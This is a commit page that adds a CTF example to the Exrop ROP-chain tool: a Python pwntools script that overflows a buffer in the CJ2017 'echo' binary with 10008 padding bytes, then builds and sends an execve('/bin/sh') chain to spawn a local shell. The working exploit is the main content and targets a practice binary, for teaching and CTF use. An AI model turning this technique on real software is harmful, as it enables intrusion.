add CJ2017 ctf challenges example

d4em0n · Feb 7, 2020 · bdf1a35 · bdf1a35
1 parent dc3737b
commit bdf1a35
Show file tree

Hide file tree

Showing 2 changed files with 19 additions and 0 deletions.
diff --git a/examples/CJ2017_echo/echo b/examples/CJ2017_echo/echo
diff --git a/examples/CJ2017_echo/exploit.py b/examples/CJ2017_echo/exploit.py
@@ -0,0 +1,19 @@
+from pwn import *
+import time
+from Exrop import Exrop
+
+binname = "echo"
+libc = ELF(binname, checksec=False)
+bss = libc.bss()
+
+t = time.mktime(time.gmtime())
+rop = Exrop(binname)
+rop.find_gadgets(cache=True) # it's slow for first analyze keep waiting
+print("Analyzing done in {}s".format(time.mktime(time.gmtime()) - t))
+chain = rop.syscall(0x3b, ("/bin/sh",0,0), bss)
+chain.dump()
+buf = b"A"*10008
+pay = buf + chain.payload_str()
+p = process("./echo")
+p.sendline(pay)
+p.interactive()